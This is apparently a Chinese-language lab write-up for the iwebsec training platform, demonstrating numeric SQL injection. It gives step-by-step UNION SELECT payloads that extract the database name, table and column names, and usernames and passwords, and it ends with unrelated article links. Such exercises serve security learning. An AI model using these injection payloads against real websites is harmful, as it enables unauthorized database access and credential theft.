当前位置: 首页 > news >正文

iwebsec-SQL数字型注入

news 来源:原创 2025/4/30 19:47:40

 

1.判断是否存在漏洞

添加and 1=1发现正常显示,添加and 1=2无回显条目,则存在sql注入漏洞

2.因为有回显,尝试union联合注入,使用order by判断出有3个字段

3.使用union联合注入查看回显位,发现3三个字段均有回显,任意使用字段注入即可

4.获取数据库名

?id=-1 union select database(),2,3

5.获取表名,这时候发现如果使用1和2回显位会显示报错,那么可以使用3回显位回显

?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()

6.猜测用户可能存在user或users表中,先使用user表查看字段

?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name="user"

7.查看id=1的username和password

这里应该不是user表,真是用户存在users表,将表名改为users一样

?id=-1 union select 1,2,group_concat(username,',',password) from user where id=1

 

相关文章:

  • 基于WebRTC的嵌入式音视频通话SDK:EasyRTC跨平台兼容性技术架构实时通信的底层实现
  • kotlin中的数据转换
  • Qt 通过MSVC编译运行项目
  • numpy学习笔记1:zeros = np.zeros((3, 3)) 详解
  • 脚本一键式启动Nginx、Mysql、Redis
  • C语言每日一练——day_11
  • 性能测试之grafana展示jmeter测试指标与主机监控
  • DApp用户激励机制设计:从代币经济到行为心理学的深度解构
  • Oracle常见系统函数
  • C# 中泛型(Generics)‌的核心概念
  • C# 事件(Event)核心概念
  • JVM的垃圾回收器都有哪些?
  • 尚硅谷爬虫(解析_xpath的基本使用)笔记
  • 《算法笔记》9.2小节——数据结构专题(2)->二叉树的遍历 问题 A: 复原二叉树(同问题 C: 二叉树遍历)
  • 小程序电子画册制作,用户体验为王!
  • 【多线程】线程不安全问题
  • 每日学习Java之一万个为什么(待补充)
  • Web Component 教程(四):如何优雅的使用 template 模块
  • springboot集成xxl-job
  • 使用 libmodbus 实现 Modbus 通信
  • 央行就《关于规范供应链金融业务引导供应链信息服务机构更好服务中小企业融资有关事宜的通知》答问
  • 医学统计专家童新元逝世,终年61岁
  • 屠呦呦当选美国国家科学院外籍院士
  • 不准打小孩:童年逆境经历视角下的生育友好社会
  • 农业农村部:把住能繁母猪存栏量“总开关”,引导养殖场户优化母猪存栏结构、合理控制产能
  • 深入贯彻中央八项规定精神学习教育中央指导组培训会议召开